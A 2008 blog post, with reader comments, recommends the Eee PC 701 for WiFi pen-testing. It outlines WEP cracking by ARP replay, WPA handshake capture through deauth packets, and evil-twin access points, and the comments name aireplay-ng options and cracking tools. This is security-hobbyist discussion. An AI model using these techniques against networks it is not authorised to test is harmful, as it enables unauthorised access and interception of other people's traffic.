Monday, September 15, 2008

The Perfect NetBook: Eee 701 2G Surf

The Register has a review of netbooks (mini notebook computers).

For security professionals, the best netbook I've found is the original one, the Eee PC 701 (aka. Eee PC 2G Surf). The thing that makes it perfect is the Atheros WiFi card in the computer and the $250 price tag.

WiFi hacking/pen-testing requires a card that can both receive packets in monitor mode and send/inject inject raw packets.

WiFi was designed with the idea that the chip should include it's own low-power microprocessor to take care of all the management traffic. In this way, the host machine can be asleep saving power. The consequence of this is that the host machine is typically unable to see the raw packets nor send raw packets of its own.

Atheros designed its chips to be more open. The "madwifi" project was able to create Linux drivers for Atheros chips that allow full control over packets.

Other chips allow a subset of these abilities. There are several others that allow "monitor mode" to receive packets. Few, though, allow the ability to send every type of packet. They will overwrite the sequence numbers, for example, or prevent fragmentation. Others will refuse to send corrupt packets.

When doing WiFi fuzzing, you need to be able to craft every type of packet, including corrupt packets (indeed, that's the point of fuzzing -- to see how a system handles corrupt packets).

The easiest method for WEP cracking is to replay encrypted ARP packets (identified by their size and broadcast address) over and over to generate encrypted responses. After about 40,000 response packets, the 128-bit WEP can be cracked in just a few seconds. I cracked my home WEP test network in about 15-minutes.

For cracking WPA, you need to be able to send deauth packets to force stations to re-authenticate. You then grab this information and hope they've chosen an easily guessable password that can be dictionary cracked.

The best thing about the Atheros chipset is that there exists full access-point software. That means you can setup the Eee PC as a full access-point. For pen-testing, you can also set it up as an "evil twin" -- so that users log onto your access-point instead of their intended one (allows you to intercept their traffic as they surf the Internet).

The Eee PC models contain Ralink chips for 802.11n. Right now, there are no driver for either monitor mode or transmit for these chips. (Note that the Wikipedia article on Eee PC claims that all models use Atheros WiFi chips -- this is wrong). You can, however, buy $33 mini-pci cards and replace the WiFi if you want.

Another important feature is the SD slot within the Eee PC. At NewEgg, 4GB cards are $10 and 16GB cards $40. It's pretty easy to install BackTrack distro and boot from these cards. You could replace the existing OS, but I'm to lazy and boot distros like BackTrack and Knoppix from SD cards.

6 comments:

Andre Gironda said...

Only problem is that you also need another card to establish limited connectivity if there are zero clients currently on the AP under attack. Although I guess any USB or another laptop would work for this purpose. The arp reinjection attacks for WEP cracking otherwise won't work, as you'll never find a 68-byte packet from a client-radio that is tods=1, BSSID set to AP under attack, and dest-mac set to broadcast.

Then, there's the additional problem if you want to crack WEP while doing an evil twin, but that's probably a very rare situation.

I suggest the Aircrack-ng GUI under Windows. Call me a sucker for liking anything Windows -- but this is going to bring WEP cracking to a lot more people. It appears to switch between PTW and regular attacks depending on how many packets you have -- and almost all configuration flags are accessible from an advanced menu. I can always boot to Linux if I need to with BT3, WiFiSlax, or WiFiWay.

The PICO E-12LX would work nicely for WPA cracking, even under Windows with oc-v0.4-win's cowpatty (or for btpincrack). That's why I roll an older X-series Thinkpad. I've got access to the internal WiFi for limited connecting (i.e. causing encrypted arps on an otherwise dormant AP). I've got access to PCMCIA for an Atheros chipset card. I've got access to CF for the E12LX. I use a USB BT device, but I prefer these to built-in support.

Robert Graham said...

The arp reinjection attacks for WEP cracking otherwise won't work, as you'll never find a 68-byte packet from a client-radio that is tods=1, BSSID set to AP under attack, and dest-mac set to broadcast.

Hmmm, seems to work just fine for me when I cracked my home network.

I had airodump-ng running in one window. I had aireplay-ng --arpreplay running in a second window. I ran aireplay-ng --deauth in a third window to disassociate a client, forcing it to reassociate and generate an ARP. All of this seem to work fine from only the built-in Atheros card.


I had airodump-ng running in one window on ath2, then aireplay-ng -arpinject

Andre Gironda said...

... to disassociate a client, forcing it to reassociate and generate an ARP. All of this seem to work fine from only the built-in Atheros card

This, like I said, assumes that another client is available! Let's say it's just your Atheros in monitor / reinj mode and the AP. Then what do you do?

For those using Cowpatty, you might want to check out this new tool as well
http://code.google.com/p/pyrit/

devilok said...

FWIW, you can pick up an Acer Aspire One for $329. It's significantly more powerful, and runs the Atheros AR5006EG chipset, which is supported under madwifi (http://madwifi.org/ticket/859).

Marc-Andre said...

i was curious, on what kind of laptop's you guys use. i saw a couple of pictures, with you two on them and wondered the models of the ultraportables.

thanks

JibJab said...

Andre, don't you know about the -p 0841 attack? Read up http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

how annoying that I have to sign up to google to leave a comment.